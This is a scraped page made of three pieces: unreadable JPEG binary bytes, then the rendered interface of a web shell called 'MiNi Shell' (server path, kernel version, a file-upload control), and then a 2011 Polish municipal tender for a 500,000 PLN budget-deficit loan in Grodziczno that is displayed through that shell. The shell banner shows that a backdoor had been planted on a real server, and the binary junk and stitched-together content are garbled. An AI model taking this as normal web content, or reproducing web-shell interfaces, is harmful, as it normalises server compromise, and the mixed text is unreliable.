JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111102/359728-N-2011.html

<p class="kh_header"><b>Grodziczno: Udzielenie i obsługa kredytu na finansowanie planowanego deficytu budżetu Gminy Grodziczno</b><br>
<b>Numer ogłoszenia: 359728 - 2011; data zamieszczenia: 02.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Grodziczno , Grodziczno 17A, 13-324 Grodziczno, woj. warmińsko-mazurskie, tel. 056 4729126, faks 056 4729106.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.grodziczno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Udzielenie i obsługa kredytu na finansowanie planowanego deficytu budżetu Gminy Grodziczno.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje udzielenie i obsługę kredytu do wysokości 500000,00 PLN ( słownie: pięćset tysięcy złotych 00/100) przeznaczonego na  finansowanie planowanego deficytu budżetu Gminy Grodziczno.
2.Okres kredytowania ustala się na 9 lat, z karencją w spłacie kredytu liczoną od dnia podpisania umowy kredytowej do dnia 29.03.2012 roku. 
3.Kredyt zostanie uruchomiony w transzach w terminie 2 dni od dnia podpisania umowy na podstawie pisemnych wniosków Zamawiającego.
Zamawiający zakłada wykorzystanie kredytu maksymalnie do dnia 31.12.2011 roku:
Nr transzy	Data wnioskowania o transzę - do dnia	Wysokość transzy w PLN
1	                   31.12011 roku	                                  500 000,00
Uruchomienie transzy kredytu nastąpi w ciągu 2 dni od dnia złożenia przez Zamawiającego pisemnego wniosku o uruchomienie transzy kredytu. 
Zamawiający zastrzega sobie prawo do zmiany terminów uruchomienia i wysokości poszczególnych transz kredytu. Zmiana taka nie może pociągnąć za sobą dodatkowych opłat i prowizji ze strony Wykonawcy.
4. Spłata kredytu nastąpi w następujący sposób:
1)raty kapitałowe płatne w 36 ratach kwartalnych, na koniec każdego kwartału - pierwsza rata płatna do dnia 30.03.2012 roku , ostania rata płatna do dnia 28.12.2020 roku, jak niżej :
Nr raty kapitałowej	Płatna do dnia	Wysokość raty kapitałowej w PLN
1	                        30.03.2012	         1 250,00
2	                        29.06.2012	         1 250,00
3	                        28.09.2012	         1 250,00
4	                        28.12.2012	         1 250,00
5	                        29.03.2013	         1 250,00
6	                        28.06.2013	         1 250,00
7	                        30.09.2013	         1 250,00
8	                        27.12.2013	         1 250,00
9	                        31.03.2014	         1 250,00
10	                        30.06.2014	         1 250,00
11	                        30.09.2014	         1 250,00
12	                        29.12.2014	         1 250,00
13	                        31.03.2015	         5 000,00
14	                        30.06.2015	         5 000,00
15	                        30.09.2015	         5 000,00
16	                        28.12.2015          5 000,00
17	                        31.03.2016	         5 000,00
18	                        30.06.2016	         5 000,00
19	                        30.09.2016	         5 000,00
20	                        27.12.2016	         5 000,00
21	                        31.03.2017	         8 750,00
22	                        30.06.2017	         8 750,00
23	                        29.09.2017	         8 750,00
24	                        27.12.2017	         8 750,00
25	                        30.03.2018	         28 750,00
26	                        29.06.2018	         28 750,00
27	                        28.09.2018	         28 750,00
28	                        27.12.2018	         28 750,00
29	                        29.03.2019	         37 500,00
30	                        28.06.2019	         37 500,00
31	                        30.09.2019	         37 500,00
32	                        27.12.2019	         37 500,00
33	                        31.03.2020	         36 250,00
34	                        30.06.2020	         36 250,00
35	                        30.09.2020	         36 250,00
36	                        28.12.2020	         36 250,00
2)oprocentowanie wraz z marżą płatne od uruchomienia pierwszej transzy w okresach miesięcznych, na koniec następnego miesiąca. 
5.Zabezpieczenie spłaty kredytu - weksel własny In blanco.
6.Kredyt powinien być udzielony w oparciu o zmienną stopę procentową, na podstawie stawki referencyjnej WIBOR 3M powiększonej o oferowaną marżę banku, niezmienną przez cały okres spłaty kredytu.
Stawkę WIBOR 3M z dnia 28.10.2011 roku należy przyjąć jedynie dla porównania ofert i będzie ona zmienna w okresie kredytowania.
Od wykorzystanego kredytu Wykonawca będzie mógł pobierać odsetki według stawki ustalonej w następujący sposób:
1)Oprocentowanie jest zmienne i stanowi sumę zmiennej stawki WIBOR 3M oraz stałej marży bankowej.
2)Stawka WIBOR 3M zmienia się w cyklu kalendarzowym kwartalnym i przyjmuje wartość z ostatniego dnia roboczego miesiąca poprzedzającego kolejny okres.
7.Do obliczenia kosztów należy przyjąć rzeczywistą liczbę dni w danym roku.
8.Celem wstępnego zbadania zdolności kredytowej oraz opracowania własnych informacji przez Wykonawcę Zamawiający dołącza do SIWZ następujące dokumenty stanowiące załącznik nr 8 do SIWZ:
1)	Uchwała RIO nr RIO.VIII-0120-619/10 z dnia 14.12.2010r
2)	Uchwała RIO nr RIO.VIII-0120-620/10 z dnia 14.12.2010r
3)	Uchwała RIO nr RIO.VIII-0120-621/10 z dnia 14.12.2010r
4)	Uchwała RIO nr RIO.VIII-0120-176/11 z dnia 31.03.2011r
5)	Uchwała RIO nr RIO.VIII-0120-250/11 z dnia 18.04.2011r
6)	Uchwała RIO nr RIO.VIII-0120-339/11 z dnia 16.05.2011r
7)	Uchwała RIO nr RIO.VIII-0120-572/11 z dnia 06.09.2011r
8)	Rb-NDS kwartalne do 31.03.2011r
9)	Rb-NDS kwartalne do 30.06.2011r
10)	Rb-NDS kwartalne do 30.09.2011r
11)	Rb-N kwartalne na koniec I kw.2011r
12)	Rb-N kwartalne na koniec II kw.2011r
13)	Rb-N kwartalne na koniec III kw.2011r
14)	Rb-Z kwartalne na koniec I kw.2011r
15)	Rb-Z kwartalne na koniec II kw.2011r
16)	Rb-Z kwartalne na koniec III kw.2011r
17)	Zarządzenie Wójta Gminy nr 13/2011 z dnia 16.03.2011r
18)	Zarządzenie Wójta Gminy nr 14/2011 z dnia 16.03.2011r
19)	Zarządzenie Wójta Gminy nr 15/2011 z dnia 18.03.2011r
20)	Zarządzenie Wójta Gminy nr 19/2011 z dnia 28.03.2011r
21)	Zarządzenie Wójta Gminy nr 30/2011 z dnia 26.04.2011r
22)	Zarządzenie Wójta Gminy nr 37/2011 z dnia 24.05.2011r
23)	Zarządzenie Wójta Gminy nr 45/2011 z dnia 20.06.2011r
24)	Zarządzenie Wójta Gminy nr 47/2011 z dnia 30.06.2011r
25)	Zarządzenie Wójta Gminy nr 52/2011 z dnia 11.07.2011r
26)	Zarządzenie Wójta Gminy nr 61/2011 z dnia 22.08.2011r
27)	Zarządzenie Wójta Gminy nr 66/2011 z dnia 05.09.2011r
28)	Zarządzenie Wójta Gminy nr 69/2011 z dnia 30.09.2011r
29)	Zarządzenie Wójta Gminy nr 74/2011 z dnia 18.10.2011r
30)	Uchwała Rady Gminy nr III/11/2010 z dnia 30.12.2010r
31)	Uchwała Rady Gminy nr III/12/2010 z dnia 30.12.2010r
32)	Uchwała Rady Gminy nr IV/22/2011 z dnia 28.01.2011r
33)	Uchwała Rady Gminy nr IV/23/2011 z dnia 28.01.2011r
34)	Uchwała Rady Gminy nr IV/28/2011 z dnia 28.01.2011r
35)	Uchwała Rady Gminy nr V/29/2011 z dnia 25.03.2011r
36)	Uchwała Rady Gminy nr V/30/2011 z dnia 25.03.2011r
37)	Uchwała Rady Gminy nr VI/55/2011 z dnia 14.04.2011r
38)	Uchwała Rady Gminy nr VI/56/2011 z dnia 14.04.2011r
39)	Uchwała Rady Gminy nr VII/58/2011 z dnia 23.05.2011r
40)	Uchwała Rady Gminy nr VII/59/2011 z dnia 23.05.2011r
41)	Uchwała Rady Gminy nr VIII/68/2011 z dnia 17.06.2011r
42)	Uchwała Rady Gminy nr VIII/69/2011 z dnia 17.06.2011r
43)	Uchwała Rady Gminy nr IX/71/2011 z dnia 05.07.2011r
44)	Uchwała Rady Gminy nr IX/72/2011 z dnia 05.07.2011r
45)	Uchwała Rady Gminy nr X/76/2011 z dnia 28.07.2011r
46)	Uchwała Rady Gminy nr X/77/2011 z dnia 28.07.2011r
47)	Uchwała Rady Gminy nr XI/81/2011 z dnia 22.08.2011r
48)	Uchwała Rady Gminy nr XI/82/2011 z dnia 22.08.2011r
49)	Uchwała Rady Gminy nr XII/92/2011 z dnia 21.09.2011r
50)	Uchwała Rady Gminy nr XII/93/2011 z dnia 21.09.2011r
51)	Zaświadczenie z Urzędu Skarbowego o nie zaleganiu w podatkach 
52)	 Zaświadczenie z Zakładu Ubezpieczeń Społecznych o nie zaleganiu w płaceniu składek na ubezpieczenia społeczne
53)	Uchwała Rady Gminy nr IX/88/2003 z dnia 28.10.2003r 
54)	Uchwała Rady Gminy nr XIX/145/2008 z dnia 26.09.2008r   
55)	Uchwała Rady Gminy nr IX/73/2011 z dnia 05.07.2011r 
56)	Zaświadczenie o numerze identyfikacyjnym REGON 
57)	Decyzja w sprawie nadania NIP 
58)	Potwierdzenie zarejestrowania podmiotu jako podatnika VAT 
59)	Zaświadczenie o wyborze Wójta 
60)	Akt powołania Skarbnika.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.12.2020.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem uczestnictwa w przetargu jest wniesienie zgodnie z Art.45 Prawa zamówień Wadium w wysokości 5000,00 zł. [słownie: pięć tysięcy złotych 00/100], w terminie do dnia 15 listopada 2011 roku do godz. 8,30 na konto Bank Polskiej Spółdzielczości S.A. Bank Spółdzielczy Iława O/Grodziczno nr 40 8831 1038 2001 0000 0101 0003, uwzględniając, że w dniu 14 listopada 2011 roku do godz. 15,00 środki pieniężne muszą znajdować się na koncie Zamawiającego.  
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
1)   pieniądzu
2)   poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
3)   gwarancjach bankowych
4)   gwarancjach ubezpieczeniowych
5)   poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z późniejszymi zmianami).
3. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego.
4. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
5.Wadium wniesione w innej formie niż pieniądz należy złożyć w formie oryginału w pokoju Nr 5 [Kasa] w siedzibie Zamawiającego, a kserokopię potwierdzoną za zgodność z oryginałem przez osobę uprawnioną do składania oświadczeń woli w imieniu Wykonawcy dołączyć do oferty, w przypadku przesłania oferty pocztą lub kurierem oryginał należy złożyć w oddzielnym opakowaniu, a do oferty wpiąć kopię potwierdzoną za zgodność z oryginałem. 
6.Zamawiający przechowa, a następnie dokona zwrotu lub zatrzyma wadium zgodnie z warunkami określonymi w art. 46 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych w ofercie dokumentów i oświadczeń wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych w ofercie dokumentów i oświadczeń wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych w ofercie dokumentów i oświadczeń wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych w ofercie dokumentów i oświadczeń wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych w ofercie dokumentów i oświadczeń wg formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawcy zobowiązani są również dostarczyć do przedkładanej oferty następujące dokumenty:
1) Wypełniony i podpisany formularz ofertowy wraz z ceną oferty wg załącznika nr 1 do SIWZ;
2) Pełnomocnictwo jeśli jest wymagane (oznacza to, że jeżeli upoważnienie do podpisywania dokumentów przetargowych nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy - odpisu z właściwego rejestru - to do oferty należy dołączyć oryginał lub poświadczoną kopię stosownego pełnomocnictwa wystawionego przez osoby do tego upoważnione.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia do oferty należy dołączyć odpowiednie pełnomocnictwo w oryginale lub kopii;
3)W przypadku wykonawców utworzonych na podstawie ustawy Kodeks Spółek Handlowych, Prawa Spółdzielczego, Prawa Bankowego - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, potwierdzający, iż Wykonawca prowadzi działalność w zakresie objętych zamówieniem wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
4)W przypadku banku państwowego utworzonego na podstawie ustawy Prawo Bankowe - rozporządzenie Ministra Skarbu Państwa w sprawie nadania statutu, aktualny skład zarządu wraz z dokumentami powołującymi poszczególnych członków zarządu,
5)Projekt umowy o kredyt sporządzony w sposób wyczerpujący i kompletny, w szczególności winien zawierać istotne dla Zamawiającego postanowienia z rozdziału XVI niniejszej specyfikacji,
6)Dowód wniesienia Wadium zgodnie z działem VIII SIWZ.
2.Oświadczenia wynikające z warunków określonych niniejszą specyfikacją:  
1) Oświadczenie o akceptacji warunków przetargowych zamawiającego w tym również okresu związania ofertą w okresie 30  dni od daty składania  ofert wg załącznika nr 2 do SIWZ,
2) Oświadczenia wymagane na podstawie Ustawy Prawo zamówień publicznych, że spełniają warunki art. 22 wg załącznika nr 2 do SIWZ;
3. Zamawiający zastrzega sobie prawo żądania od wykonawców potwierdzenia  prawidłowości składanych dokumentów.
4.Oferta składana przez podmioty wystepujące wspólnie (konsorcjum): 
1) W przypadku złożenia przez dwa lub kilka podmiotów [tj. osób fizycznych, osób prawnych oraz jednostek organizacyjnych nie posiadających osobowości prawnej] oferty wspólnej (konsorcjum) do oferty musi być załączona umowa konsorcjum.
2) Zamawiający bezwzględnie wymaga, aby umowa konsorcjum:
a)Jednoznacznie określała wspólne przedsięwzięcie gospodarcze obejmujące swoim zakresem przedmiot zamówienia.
b)Zawierała zobowiązanie do złożenia oferty wspólnej i realizacji zamówienia publicznego w przypadku wyboru oferty.
c)Określała sposób reprezentacji wszystkich podmiotów, w tym wskazanie podmiotu wiodącego, uprawnionego do podpisania oferty, umowy oraz bezpośredniego kontaktowania się i współdziałania z zamawiającym.
d)Stwierdzała, że partnerzy konsorcjum będą odpowiedzialni solidarnie za całość podjętych zobowiązań w ramach realizacji zadania inwestycyjnego,
e)Była zawarta na czas trwania umowy, powiększony o okres obowiązywania gwarancji i rękojmi.
f)Określała sposób współdziałania podmiotów z określeniem podziału zadań w trakcie realizacji zamówienia.
g)Była zawarta z notarialnie potwierdzonymi podpisami.
3) Podmiot wiodący wskazany w  umowie i przedkładający ofertę zobowiązany jest do przedłożenia wszystkich dokumentów wymienionych w SIWZ. 
4) Każdy podmiot oferty wspólnej [konsorcjum] zobowiązany jest dołączyć dokumenty  wymienione w  SIWZ. 
